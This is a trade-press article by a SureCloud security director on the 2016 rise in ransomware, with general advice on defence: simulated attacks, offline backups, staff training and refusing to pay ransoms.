At the end of 2015, many cyber security commentators predicted that ransomware attacks would continue to rise during 2016. But few could have expected just how dramatic that increase would actually turn out to be.
A new study found that 39% of UK companies were victims of a ransomware attack in the last 12 months – and this was below the global average of 48%.
The study estimated that IT staff lost nearly a full working week (33 hours) to restoring the encrypted data from backups. What’s more, it isn’t just large organisations being targeted: a separate report from Kaspersky Lab found that small businesses faced eight times more ransomware attacks in the third quarter of 2016 than the same period last year.
One of the key reasons for the growth in attack volumes is simply this: ransomware is proven to work. Also, for the criminals behind the attacks, it’s a numbers game: the more businesses they infect, the more ransoms they can demand and potentially have paid.
The way ransomware is delivered has also evolved, to help infections evade conventional security controls such as signature-based antivirus software.
For example, recent variants use a two-stage infection process, with the first stage being a phishing email with an attachment harbouring a macro. If the user opens the document, the macro activates and contacts the attacker’s remote server to download the ransomware.
In effect, the user is ‘inviting’ the ransomware onto their machine, which makes this attack vector particularly difficult to block; in most examples the macro is often purposely designed to evade the majority of anti-virus software and current detection techniques.
One of the challenges in mitigating ransomware is how quickly it can encrypt large numbers of files, rendering them inaccessible and stopping the normal flow of work.
The damage is often already done by the time the infection has been detected. Organisations are then faced with removing the infection and trying to restore files from backups to recovery.
Understanding where the risk of ransomware lies
The biggest risk within a network is that the ransomware has the same access to files and data as the person who uses the infected machine.
This can be especially dangerous if an executive is successfully targeted, as such highly privileged users often require access to vast quantities of company data.
Another major ransomware risk is a social one. If an employee is given the option to pay and conceal the fact that they accidentally triggered an infection, they may do so out of fear of losing their job.
However, the malware can often still reside on the computer after the ransom is paid and can act as a remote access toolkit (RAT) to capture screenshots, keystrokes and network traffic. This includes sending files and passwords back to the attackers to sell or use for executing further attacks against the organisation.
But while the task of protecting against ransomware may seem insurmountable there are steps organisations can take to defend against the potential impact of a ransomware attack.
Practice makes perfect
First and foremost, as with so many facets of life, organisations need to bear in mind that practice makes perfect, and that maxim also applies to ransomware attack preparations.
As we saw earlier with 39% of UK organisations being hit in the last 12 months its clear to see it’s a case of when not if a business is attacked with ransomware.
To hone their readiness for an attack organisations should run simulated ransomware attacks, mimicking a real threat without any of the danger.
As an example SureCloud’s Simulated Ransomware Service triggers two main actions if a machine is successfully infected.
First, the ransomware performs harmless actions designed to trigger and test for advanced behavioural analysis checks, then displays a typical ransomware message to demonstrate and evidence the infection, which also testing to see if an employee attempts to make payment on a compromised device.
Simulating attacks, such as these, provides businesses with visibility of how likely they are to be successfully compromised via a targeted and focused attack, whilst also identifying where current controls are ineffective at preventing and/or detecting an attack.
Furthermore, they will be able to see what could be encrypted from various access points should a real attack occur. This in-turn would allow the organisation to deploy more restrictive permissions along with improving user awareness and training to help early detection and stop the spread in the event of a real attack.
Prevention is more effective than remediation
In addition to practising how to respond in the event of a ransomware attack successfully infiltrating the network, there are also a number of measures businesses can take to reduce the likelihood of ransomware making its way onto the corporate network. Let’s take a look at these steps in turn.
1. Security controls
While some forms of ransomware can circumvent traditional security controls they nonetheless remain a critical part of an organisations defences.
These should include email filtering, web filtering and a corporate anti-virus solution that includes ransomware detection capabilities.
2. Have robust back-up in place
By regularly backing-up files and data to an offline location (such as tape) that can’t be touched by the ransomware, should infection occur.
By ensuring this, organisations will put themselves in an excellent position to mitigate the impact of a ransomware attack. Allowing infecting devices to be removed from the network, wiped and data restored in full.
3. Staff education and training
This is absolutely critical within organisations of all sizes to ensure that knowledge of attacks is shared.
Employees can be educated to watch out for the tell-tale signs and flags of a potential ransomware infection, whatever the delivery mechanism. This can be aided massively by a simulated and targeted attack against your organisation.
4. Never pay the ransom
Under absolutely no circumstances should the ransom be paid. If you pay the ransom you will open up yourself or the organisation to becoming a key target for wider attacks, and there is absolutely no guarantee that your files will actually be decrypted. After all, would you rely on a criminal’s promise?
With ransomware attacks only set to increase in volume in 2017 it is critical that organisations take steps to prevent against this insidious attack vector. After all they can little afford to add ‘fortune’ to the growing list of threats that could hold them hostage in the year ahead.
Sourced by Luke Potter, security practice director at SureCloud